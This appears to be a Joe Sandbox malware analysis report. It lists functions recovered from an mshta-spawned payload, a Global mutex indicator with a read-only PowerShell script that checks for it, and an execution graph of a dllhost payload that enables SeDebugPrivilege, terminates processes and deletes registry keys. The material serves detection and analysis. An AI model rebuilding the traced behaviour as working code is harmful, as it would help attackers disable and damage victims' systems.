Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
• Instruction ID: 6f60aa4ffd1176d1df739e549224c5cb99eed977b7a2ef41b620533890ea14b8
• Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
• Instruction Fuzzy Hash: 1AF05E70306F92D1EA018F53BA15299E621EB4FFE0F048132FE460BB28EE38C481C309
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
• Instruction ID: ec7c768757244c4dacb1848278a7ed87cfb55973578f730c9e72d42b3f095e36
• Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
• Instruction Fuzzy Hash: 63F03A71722F4191EF464F60E6947A4BB60AB4FBD0F44602AA90B4A260EF38C499CB02
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
• Instruction ID: 067530421aa415b3e426a8bb6027a005a3838962278c79eaf6e263697cb1c13f
• Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
• Instruction Fuzzy Hash: 5002C83221AB84C6E761CF55F59079AB7A0F3DA784F114116FA8E87BA8EF79C444CB01
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• API String ID: 2210144848-0
• Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
• Instruction ID: d203cd5db921ee905cf7dc2ef50a84b419aa93113f07238f0b0c4a9b4c5914d4
• Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
• Instruction Fuzzy Hash: 4581A032712E12C9FB569F648A407EDABA2F74FBD8F444217FA0A5B691EB348441C712
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
• Instruction ID: 6e9532786cbdca0e156fbd0fb65b8a04cc612657cd6844af7565194307e7464a
• Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
• Instruction Fuzzy Hash: 0561DA3661AB44C6EB619F15F55075AB7A0F39A788F110127FA8E8BBA4EB78C440CF05
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: 5a1b5ca53786cbf6d39373e6ca6d626c02978b1a4149a11872ea8bd03b61494c
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: D9117372B56F2241F6A6916AD7953E91040AB7F3F4F184B28BA6607EDB8B3488C14203
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction ID: d88096662d0153a66654303d9494f0c836c1f1b875289841d42d898a64fec9e7
                                                                                                                      • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                                      • Instruction Fuzzy Hash: E211E733B47E2301F66A1965D7553E58A407B6F3F0F140626FA662E7D7EB684C81C202
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1092925422-0
                                                                                                                      • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction ID: 54e5756abe6fa3c76e3175197b53ca79500eb2761b0be7e8c833124ac9a39f69
                                                                                                                      • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction Fuzzy Hash: E4113736706B41C3EB658F22E64478AB7B0F74BB90F054026EA880B794FF39C948D745
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction ID: f2f5e955dbec54537bdb701bd4e824a6fba55f67bea7c000e4027a097a2c200c
                                                                                                                      • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction Fuzzy Hash: D651B2367136008AEB56DF15D604B9977A9F34FBD8F518220EA9747BC8EB38C9C18702
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction ID: d97fa706ac810d65f73ff12e11b1e4144ec2b971a006a521d2e836ccadbc7390
                                                                                                                      • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction Fuzzy Hash: 57315A3131264096EB16DF15E944B9977A8F74FBD8F058214BE9707BC4DB3CC9818706
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction ID: 06e2bf78dd25355b9647ceb32fbfced99056287e211598471632cd10ce9d7a91
                                                                                                                      • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction Fuzzy Hash: A271B132702E85C2EA269E259A45BEAAB94F74F7D4F420017FD494BB88EF35C604C742
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction ID: 5a1792d0172c0542b728fed8180503d46c045727c5c6ccc8760714f537646b77
                                                                                                                      • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction Fuzzy Hash: D251B933306BC1C2E6669E299254BEEEB51F78F7C0F160027ED850BB59EB39C5018B46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                      • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction ID: c1a0a57d68e428412cd33225ca17d8cd7264e6bc02a32dc6e137868d2688e70a
                                                                                                                      • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction Fuzzy Hash: 1341B232316A4592EB618F25E9443EABBA0F78A7D4F504122EE4D8B788EB38C441CB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001A00BDB2A4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction ID: 5c65c8e07f2e6bba86b1e0a57da172ad8599d3035f99905eedb36c8842fea66c
                                                                                                                      • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction Fuzzy Hash: 2F217C36305B4182E662CF16AA40B9AEA90F79BBD0F064016AE894B754FF38C495C705
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001A00BDB2B39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction ID: e200cf13dc4769abfcf4598354e47784319e22ba1082438064a1e6d370fc1f80
                                                                                                                      • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction Fuzzy Hash: 8A21AE32701B4182E7629F16BA44B9AFB90F78FB80F06402AEE494B758FF34C446C749
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

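The two OpenMutex/CloseHandle records above carry the one sample-specific indicator in this stretch of the function listing: the `Global\tmlNftmlNf...` mutex name, referenced twice (xrefs 000001A00BDB2A4D and 000001A00BDB2B39) in the PE unpacked into memory of process 0xD. The surrounding records (`_set_statfp`, `try_get_function` resolving `LCMapStringEx`, the `\\.\pipe\` prefix test beside `GetFileType`, and the `csm` bytes, which are the little-endian spelling of the MSVC C++ exception code 0xE06D7363) read as statically linked C runtime code and should not be turned into detection content. What follows is an added host check written for this page; it is not part of the Joe Sandbox report and not code from the sample. It sweeps a Windows host for the mutex with `Mutex.OpenExisting`, and it treats an access-denied result as a hit, because that outcome means the object exists but its DACL keeps the caller out. The function name `Test-IocMutex` and the `$MutexNames` list are this example's own.

```powershell
# Added example, not part of the Joe Sandbox report.
# Sweeps the local host for the single-instance mutex recovered from the
# unpacked PE in process 0xD (see the CloseHandleMutexOpen records above).

$MutexNames = @(
    'Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw'
)

function Test-IocMutex {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [string[]]$Name
    )

    foreach ($n in $Name) {
        $result = [pscustomobject]@{ Name = $n; Present = $false; Note = '' }
        try {
            # OpenExisting succeeds only if some process has already created
            # the object; a 'Global\' name is visible from every session.
            $m = [System.Threading.Mutex]::OpenExisting($n)
            $m.Dispose()
            $result.Present = $true
            $result.Note = 'opened'
        }
        catch [System.Threading.WaitHandleCannotBeOpenedException] {
            # No object by that name exists right now.
            $result.Note = 'not found'
        }
        catch [System.UnauthorizedAccessException] {
            # The object exists but its DACL denies us SYNCHRONIZE/MODIFY_STATE.
            # That is still a positive: something created it.
            $result.Present = $true
            $result.Note = 'exists, access denied'
        }
        catch [System.IO.IOException] {
            # Other Win32 failure (invalid name, object-manager error).
            $result.Note = "error: $($_.Exception.Message)"
        }
        $result
    }
}

Test-IocMutex -Name $MutexNames | Format-Table -AutoSize
```

A single-instance mutex only exists while the implant is running, so a negative result does not clear the host; it says nothing about a dormant copy on disk or about persistence that has not fired yet. Pair the sweep with the memory-dump Yara match and the process-tree findings elsewhere in this report, and keep the check read-only: the function opens and immediately releases the handle and never creates the mutex, since creating it would itself suppress a later instance of the sample and corrupt the evidence.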
                                                                                                                      APIs
                                                                                                                      Strings
Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: Stringtry_get_function
• String ID: LCMapStringEx
• API String ID: 2588686239-3893581201
• Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction ID: e994eeb8473ee2ce42edb99524e049a0a6f7113b340f99ecc08091389803b8a7
• Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction Fuzzy Hash: F511E536708B8086D6619F56B54079ABBA5F78EBD0F544126EE8D87B19EF38C450CB40
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction ID: 3d675ad305f4b60011f01be8626d93db4cc1bf856ae9dff07d3c43f449315f3a
• Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction Fuzzy Hash: 64112B32215F8082EB118F25E554799BBE5F78AB94F594221EF890B764EF3DC551C700
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpintry_get_function
• String ID: InitializeCriticalSectionEx
• API String ID: 539475747-3084827643
• Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction ID: 7f9f02a454f7ca7b4f3d673a65f39ea951a329999e2fcda576414f18e675d86d
• Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction Fuzzy Hash: 1DF09A35306F4191EA069F41A600BC9AA71AB8FBD0F498023F91A0BB14EF38C495CB02
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315
• Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction ID: a76eeab8eba0c101ae519160217dba5dc58d499fc8658bd8a04a5c490138ca18
• Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction Fuzzy Hash: 5BE06571306E0192FA075F55FA107D9E632B78F7C0F998027F9190E355EE38C455C602
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction ID: b90c0be3292b4290cd22fe31e849e46e93c3ca14b6929f8396277a63c1af27cb
• Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction Fuzzy Hash: 49219132716F80C5EA128F19E50079AF7A1FB8ABE4F054012EE8C5BB24FB78C442C700
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
• Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction ID: d6c94a215b51b18db14f0563b7663135afab6454f92611acca2e05b6b8ed55d4
• Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction Fuzzy Hash: C3E06D71702A059BF7058F62D804389BAE1FB8FFA1F49D028C9090B350EF7D8499CB45
Uniqueness
• Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 64.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 56
Total number of Limit Nodes: 2
execution_graph 107 4014fc 110 401509 107->110 127 40133e GetCurrentProcessId OpenProcess 110->127 113 401540 134 4013d1 SysAllocString SysAllocString CoInitializeEx 113->134 114 401532 RegDeleteValueW 114->113 116 401546 143 401292 GetProcessHeap HeapAlloc 116->143 118 40154b GetProcessHeap HeapAlloc 150 401081 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 118->150 120 40159d GetProcessHeap RtlFreeHeap 157 401000 RegOpenKeyExW 120->157 122 401501 ExitProcess 123 401572 123->120 124 40158c 123->124 126 40159b 123->126 163 40122b 124->163 126->120 128 401361 OpenProcessToken 127->128 129 4013cb RegOpenKeyExW 127->129 130 401372 LookupPrivilegeValueW 128->130 131 4013c4 FindCloseChangeNotification 128->131 129->113 129->114 130->131 132 401386 AdjustTokenPrivileges 130->132 131->129 132->131 133 4013b6 GetLastError 132->133 133->131 135 4014e6 134->135 136 401408 CoInitializeSecurity 134->136 139 4014e9 SysFreeString SysFreeString 135->139 137 401429 CoCreateInstance 136->137 138 40141e 136->138 140 40144d VariantInit 137->140 142 401490 CoUninitialize 137->142 138->137 138->142 139->116 140->142 142->139 144 401081 12 API calls 143->144 147 4012be 144->147 145 40130c GetProcessHeap RtlFreeHeap 145->118 146 40130a 146->145 147->145 147->146 148 4012dd OpenProcess 147->148 148->147 149 4012f0 TerminateProcess CloseHandle 148->149 149->147 151 4011fd GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 150->151 156 4010e9 150->156 151->123 152 4011fb 152->151 153 401100 OpenProcess 154 40111a K32EnumProcessModules 153->154 153->156 155 4011ea FindCloseChangeNotification 154->155 154->156 155->156 156->152 156->153 156->155 158 40106b RegDeleteKeyExW 157->158 159 40102c 157->159 158->122 160 40103e RegEnumKeyExW 159->160 161 401062 RegCloseKey 160->161 162 40102e RegDeleteKeyW 160->162 161->158 162->160 164 401240 OpenProcess 163->164 165 40128b 163->165 164->165 166 401255 164->166 165->123 171 40131f GetModuleHandleA 166->171 168 401271 169 401288 CloseHandle 168->169 170 401282 CloseHandle 168->170 169->165 170->169 172 40133b 171->172 173 40132e GetProcAddress 171->173 172->168 173->168

Callgraph

Call edges recovered from the callgraph data (node index, function, callees):
• 6 Function_004014FC -> 4 Function_00401509
• 4 Function_00401509 -> 0 Function_00401000, 1 Function_004013D1, 2 Function_00401081, 3 Function_00401292, 5 Function_0040122B, 7 Function_0040133E
• 3 Function_00401292 -> 2 Function_00401081
• 5 Function_0040122B -> 8 Function_0040131F

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 00401348
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
• OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
• LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
• AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
• GetLastError.KERNEL32 ref: 004013B6
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
Memory Dump Source
• Source File: 0000000F.00000002.1927406646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_dllhost.jbxd
Similarity
• API ID: Process$OpenToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesValue
• String ID: SeDebugPrivilege
• API String ID: 575374161-2896544425
• Opcode ID: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
• Instruction ID: e2a5f4244efd0fdb54eb2fb8bae3e68f4838b917bcc28da7506a6e19d6301c26
